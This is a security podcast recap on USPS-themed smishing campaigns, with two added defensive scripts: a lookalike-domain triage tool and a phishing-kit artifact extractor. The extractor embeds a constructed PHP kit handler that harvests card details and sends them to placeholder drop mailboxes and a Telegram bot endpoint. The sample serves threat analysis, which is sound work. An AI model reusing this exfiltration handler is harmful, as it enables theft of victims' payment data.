Breaking Badness

[Special Report] Father Phishmas, Give Us The Money


This week’s episode of Breaking Badness focuses on the recent phishing attacks against the United States Postal Service (USPS) and the research DomainTools recently shared on the blog:  

Merry Phishmas: Beware US Postal Service Phishing During the Holidays

Return to Sender – A Brief Analysis of a US Postal Service Smishing Campaign

  • We are joined by @nullcookies on this special episode of Breaking Badness where we discuss the recent smishing campaigns targeting the United States Postal Service (USPS) 
  • He recently polled friends and family on whether they had received a USPS text, and all confirmed yes. He can’t think of an example of something more prevalent in his career to this point
  • This is one of the more fascinating and impressive phishing campaigns he’s seen in a long time
  • Even if you went back to the early-to-mid 2000s “golden age” of phishing, the actors of that era would be impressed by the deliverability and volume of what’s happening today
  • For this discussion, spam is really good at very large scales (it’s also delicious) 
  • We’re seeing this influx of phishing because blocking it isn’t yet as well developed
    • It takes time for platforms to catch up and @nullcookies thinks there will be improvements – the problem is understood and they’re working on it 
    • But in the meantime, these malicious messages will continue and he agrees that it will get worse before it gets better 
    • In our community, we go toward cynicism and pessimism, but @nullcookies believes there is hope on the horizon. There are very talented people working on this problem
    • Companies like WMC Global are killing it with their phishing analysis 
    • Researchers like Gonza – @nullcookies can’t wait to see what they do 
    • We can hope to see incremental improvements 
    • M3AAWG is another entity doing really great work on this 
  • We’re in a war of attrition and creativity – there’s a constant ebb and flow of cyber criminals coming up with these creative ways to steal from people
    • There’s reason to be concerned, but we can respond to those shifts and come up with creative ideas to shut it down, or at the very least, slow it down – we can at least hold the line 
  • Smishing defined
    • In the context here, it’s a malicious URL in a text message that leads to a phishing domain
    • These lures were traditionally delivered via email, but in this instance the delivery channel is SMS
  • Use of ChatGPT or not?
    • Why, in Return to Sender, the attacker likely did not use ChatGPT
    • There are a lot of ways to abuse generative AI
    • The assumption is that it simply wasn’t needed at this point yet
    • The article points out that Google Translate was used to clone a page; with services like that, even if there’s a wide language barrier, the actors are usually writing the content themselves
    • You also have threat actors who iterate and tweak the content because they’re interested in the success rate of their spam 
    • If you are not proficient in English, you could write a prompt into ChatGPT, or you could write in your language of choice and have another platform translate it for you (machine translation)
    • Phishing actors and spammers also share information and templates 
    • There’s lots of ways they can blend into their environment 
    • It used to be effective to say “look for broken language” to avoid getting scammed, but what does the future of awareness training look like?
      • Tim would say to look at the domain names: in the examples we have, they’re not what you’d expect, and that seems like a good place to start in training
      • BUT @nullcookies wouldn’t trust URLs – we need more pervasive skepticism 
      • The tools that spammers now have to make their fraud more convincing are eons beyond what they were even a few years ago, so skepticism has to be taught; unfortunately we’ll always be on our back foot responding to this, because there are so many ways to deceive a human being
      • Phishing is both primal in that it exploits what makes people human, but advanced in its technological means 
  • This campaign is one @nullcookies can’t compare to anything in his career – but why the USPS?
    • It’s an impressive threat actor for sure
    • The volume of their sending capability is impressive 
    • But the targeting of the postal service – it’s about as trusted of a brand as you can get today
    • Its role is foundational: successful and timely delivery is part of what makes society functional
    • The environmental factor: think about the pandemic and the spike in shipping we saw, and even now, especially with the holidays approaching
    • Another thing to consider is the uptick in package theft – people have deliveries waiting – in short, people want their stuff 
    • Effective spam is a form of deception: the tactic is to short-circuit your critical thinking, and the urge not to “lose your stuff” is powerful
    • You’ve got situations where people are afraid of package theft 
    • We could do a whole separate episode on package theft, but concerns surrounding installing a video doorbell
    • But it’s a war of creativity – all these factors create a confluence – and it all draws from human psychology and avoiding discomfort 
    • Services like these also use SMS for delivery updates; nothing wrong with that, and it serves a function, but if you have a target, more familiarity increases the chances of someone being deceived
  • Phishing kits are difficult to perfect
    • The absolute top-tier kits: you’ll never get a sample, because they are so targeted and are deployed for such a short amount of time that the chance of any artifacts being collected is low
    • But mistakes are made that can be used to track them or identify those behind them 
    • For generic phishes, it’s easy to clone a website and set up the PHP processor that sends the stolen data to the attacker-controlled server; but phishing kits and campaigns, by virtue of being so public, reveal information that the actors don’t want revealed
  • What about bring-your-own-device scenarios at work? How do you mitigate that?
    • It won’t take away the truth of fraud and phishing (anyone can fall victim to a phish); for @nullcookies, it’s less about the device itself and more about the person, and about knowing these contingencies will occur
    • We all need to plan for this to happen because it WILL happen 
    • There should be no shame in admitting this, but we need to learn from the mistake and talk to people about how to avoid it – it’s about protecting people from fraud 
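
The “look at the domain names” advice above is the kind of check that can be automated for SMS lures. The following script is an added example written for this recap; it is not code from DomainTools or from the research linked above. It assumes `usps.com` is the only genuine registrable domain for the brand (an assumption, not a fact taken from the page), and the sample messages are constructed, not captured from the campaign.

```python
"""Triage the links inside SMS lures: is the URL really under the brand's own domain?"""
import re
from urllib.parse import urlsplit

# Constructed sample texts modelled on the USPS-themed lure; none is a real message.
SAMPLE_MESSAGES = [
    "USPS: your package is on hold due to an incomplete address. "
    "Confirm at https://tools.usps.com/go/TrackConfirmAction",
    "USPS: your parcel could not be delivered. "
    "Update your address at http://usps-redelivery-help.top/i",
    "Your item is waiting: https://usps.com.track-status.info/",
    "Pay the $0.30 redelivery fee at https://xn--usps-kvb.com/pay",  # constructed punycode-style label
    "Package pending, reply Y to reschedule",
]

# Assumption: the brand's genuine registrable domain. Any other registrable domain is not
# the brand, however much "usps" it contains.
TRUSTED_DOMAINS = {"usps.com"}
BRAND_TOKENS = ("usps",)

URL_RE = re.compile(r"https?://[^\s<>\"'()]+", re.IGNORECASE)


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Real tooling should use the Public Suffix List
    (e.g. the tldextract package); two labels is wrong under suffixes like co.uk."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def triage_url(url: str) -> dict:
    """Return the verdict for one URL plus the reasons behind it."""
    host = (urlsplit(url).hostname or "").lower()
    reg = registrable_domain(host)
    result = {"url": url, "host": host, "registrable": reg, "verdict": "brand", "reasons": []}
    if reg in TRUSTED_DOMAINS:
        return result
    reasons = []
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode label (possible homoglyph)")
    if any(tok in host for tok in BRAND_TOKENS):
        reasons.append(f"brand string inside untrusted registrable domain {reg}")
    if any(host.startswith(t + ".") or ("." + t + ".") in host for t in TRUSTED_DOMAINS):
        reasons.append("brand domain used as a subdomain of someone else's domain")
    if url.lower().startswith("http://"):
        reasons.append("cleartext http")
    # No reasons does NOT mean safe: it only means the link carries no brand signal at all.
    result["verdict"] = "lookalike" if reasons else "unknown"
    result["reasons"] = reasons
    return result


def triage_message(text: str) -> list:
    """Triage every URL found in one SMS body."""
    return [triage_url(u) for u in URL_RE.findall(text)]


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        for r in triage_message(msg):
            print(f"{r['verdict']:9} {r['host']:32} {'; '.join(r['reasons'])}")
```

The `unknown` verdict is deliberate and matches the caveat that URLs alone should not be trusted: a link with no brand string in it is not thereby safe, and anything short of the brand’s own registrable domain should still be treated with skepticism. The two-label `registrable_domain` is a simplification; swap in a Public Suffix List lookup before using this on real traffic.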
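
The point about phishing kits revealing information their operators would rather keep hidden is easiest to see against the kit’s PHP “processor”, the script that receives the victim’s form post and ships it off. The script below is an added example for this recap, not code from DomainTools or from any kit analyzed in the linked posts. The PHP handler it parses is a constructed stand-in (the drop addresses, bot token, chat id and subject tag are invented placeholders), and the artifact categories it pulls out are the usual analyst pivot points rather than anything specific the page reports about this campaign.

```python
"""Pull exfiltration artifacts out of a phishing kit's PHP result handler ("processor")."""
import json
import re

# Constructed stand-in for a kit's result handler. It is not a file from any real campaign;
# the addresses, bot token and chat id below are invented placeholders.
KIT_PROCESSOR = r'''<?php
$ip = $_SERVER['REMOTE_ADDR'];
$message  = "--- USPS Result ---\n";
$message .= "Name: " . $_POST['fullname'] . "\n";
$message .= "Card: " . $_POST['ccnum'] . " Exp: " . $_POST['exp'] . " CVV: " . $_POST['cvv'] . "\n";
$message .= "IP: " . $ip . "\n";
$subject   = "New rezult | " . $ip;
mail("drop.box1@example.com", $subject, $message);
mail("backup-drop@example.net", $subject, $message);
$tg = "https://api.telegram.org/bot123456789:AAExampleBotTokenOnly_NotReal123456/sendMessage";
file_get_contents($tg . "?chat_id=-100200300400&text=" . urlencode($message));
header("Location: https://www.usps.com/");
exit;
'''

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
TG_BOT_RE = re.compile(r"api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]{30,})")
TG_CHAT_RE = re.compile(r"chat_id=(-?\d+)")
POST_FIELD_RE = re.compile(r"\$_POST\[['\"]([^'\"]+)['\"]\]")
SUBJECT_RE = re.compile(r"\$subject\s*=\s*\"([^\"]*)\"")
REDIRECT_RE = re.compile(r"header\(\s*[\"']Location:\s*([^\"']+)[\"']")


def unique(seq):
    """Dedupe while keeping first-seen order."""
    seen, out = set(), []
    for x in seq:
        if x not in seen:
            seen.add(x)
            out.append(x)
    return out


def extract_artifacts(src: str) -> dict:
    """Extract the pivot points an analyst cares about from a processor's source:
    drop mailboxes, Telegram bot/chat identifiers, the fields the form harvests,
    the mail subject tag (useful for clustering kits), and the post-theft redirect."""
    redirect = REDIRECT_RE.search(src)
    return {
        "emails": sorted(set(EMAIL_RE.findall(src))),
        "urls": unique(URL_RE.findall(src)),
        "telegram_bots": [bot_id for bot_id, _token in TG_BOT_RE.findall(src)],
        "telegram_chat_ids": unique(TG_CHAT_RE.findall(src)),
        "harvested_fields": unique(POST_FIELD_RE.findall(src)),
        "subject_tags": [s.strip() for s in SUBJECT_RE.findall(src)],
        "redirect": redirect.group(1) if redirect else None,
    }


if __name__ == "__main__":
    print(json.dumps(extract_artifacts(KIT_PROCESSOR), indent=2))
```

Each bucket is a pivot: drop mailboxes and subject tags recur across kits from the same operator, a Telegram bot id and chat id tie a kit to an exfiltration channel, and the harvested field names plus the final redirect show what the lure was built to steal and where it sends the victim afterwards. Run it over every `.php` in an unpacked kit rather than one file; handlers are often split across several scripts.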

This Week’s Hoodie/Goodie Scale

Hoodie Rating: 

Tay: 4.83/10

Tim: 5.5/10

@nullcookies: 8/10


That’s about all we have for this week. You can find us on Twitter @domaintools; all of the articles mentioned in our podcast will always be included on our podcast recap. Catch us Wednesdays at 9 AM Pacific time when we publish our next podcast and blog.

*A special thanks to John Roderick for our incredible podcast music!